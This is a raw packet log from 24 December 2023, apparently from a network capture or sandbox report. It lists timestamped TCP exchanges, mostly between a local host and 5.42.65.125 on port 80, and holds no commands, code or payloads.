Dec 24, 2023 10:44:33.862421036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.862577915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.863204002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.863336086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.863388062 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.864238977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.864401102 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.864461899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.865910053 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.866096973 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.866164923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.866218090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.866230011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.866856098 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.866925955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.866990089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.867036104 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.867916107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.867928982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.867970943 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.869708061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.869757891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.869816065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.869828939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.869878054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.869920969 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.870213032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.870263100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.870313883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.871090889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.871155977 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.871201038 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.871913910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.871984005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.872840881 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.872859955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.872888088 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.872927904 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.878130913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.878284931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.878355026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.878552914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.878722906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.878776073 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.879467010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.879478931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.879538059 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.880158901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.880240917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.880362034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.881019115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.881046057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.881097078 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.881880045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.881999016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.882042885 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.882777929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.882828951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.882884026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.883696079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.883761883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.884280920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.884335995 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.884399891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.885318041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.885368109 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.885381937 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.885406971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.886050940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.886116028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.886172056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.886869907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.886929035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.886979103 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.887923002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.887988091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.888571024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.888603926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.888627052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.888653994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.888803005 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:33.888853073 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:33.889669895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.889780998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.890492916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.890547991 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.890567064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.890758991 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.891139984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.891376972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.891484022 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.891956091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.892026901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.892081976 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.892703056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.892761946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.893632889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.893645048 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.893686056 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.893713951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.894375086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.894439936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.894570112 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.895262957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.895277023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.895315886 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.896080017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.896164894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.896213055 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.896920919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.897000074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.898768902 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.906335115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.906565905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.906744003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.906765938 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.906774998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.907023907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.907553911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.907608032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.908410072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.908457994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.908520937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.908899069 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.909348965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.909360886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.909404993 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.910183907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.910254002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.910298109 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.910906076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.910964012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.911010981 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.911981106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.912224054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.912270069 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.912585974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.912619114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.913392067 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.913619041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.913644075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.914536953 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.915126085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.915199995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.915244102 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.915913105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.915982008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.916033983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.916893959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.916975975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.918587923 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.918651104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.918700933 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.920162916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.920208931 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.920397997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.921258926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.921304941 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.921380997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.921421051 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.922813892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.922975063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.923022985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.923363924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.923443079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.923489094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.923695087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.923785925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.924290895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.924344063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.924356937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.924738884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.924782991 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.924793005 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.924829006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.925112963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.925127983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.925164938 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.925534010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.925591946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.925640106 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.926104069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.926117897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.926172972 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.926377058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.926390886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.926630020 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.926959991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.927233934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.927279949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.928096056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.928195000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.928247929 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.928759098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.928841114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.928885937 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.930171967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.930185080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.930233002 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.930402040 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.930457115 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.930502892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.931058884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.931108952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.931153059 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.931874037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.931946039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.931996107 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.932765961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.932779074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.932821989 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.933801889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.933854103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.933900118 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.934492111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.934565067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.934611082 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.935233116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.935246944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.935286045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.936150074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.936225891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.936278105 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.936881065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.936898947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.936943054 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.937776089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.937923908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.937979937 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.938630104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.938927889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.938982010 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.939924002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.940016031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.940068960 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.940442085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.940547943 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.940593958 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.941124916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.941226006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.942156076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.942202091 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.942245007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.942614079 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.942790031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.942872047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.942919970 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.943866968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.943941116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.943991899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.944520950 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.944588900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.944633961 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.945445061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.945494890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.946202040 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.946249962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.946261883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.946706057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.947153091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.947233915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.947273970 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.947828054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.947844028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.947891951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.948756933 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.948812008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.948863983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.949518919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.949603081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.949647903 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.950494051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.950572014 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.950617075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.951287985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.951308012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.951364994 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.952076912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.952142954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.952898979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.952956915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.953028917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.953677893 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.953731060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.953777075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.954600096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.954727888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.954794884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.954840899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.955600023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.955715895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.955760956 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.956290007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.956332922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.956377029 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.957122087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.957271099 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.957317114 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.957895994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.958013058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.958611012 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.958667994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.958754063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.959613085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.959625006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.959665060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.959695101 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.960397959 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.960472107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.961034060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.961349964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.961461067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.961508989 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.962080002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.962192059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.962640047 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.962831974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.962943077 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.962996006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.963716984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.963747025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.963790894 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.964569092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.964613914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.964656115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.965362072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.965435028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.966214895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.966244936 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.966259956 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.966283083 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.967274904 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.967327118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.967902899 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.967945099 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.967962980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.968672037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.968714952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.968956947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.969002962 CET	49724	80	192.168.2.5	5.42.65.125
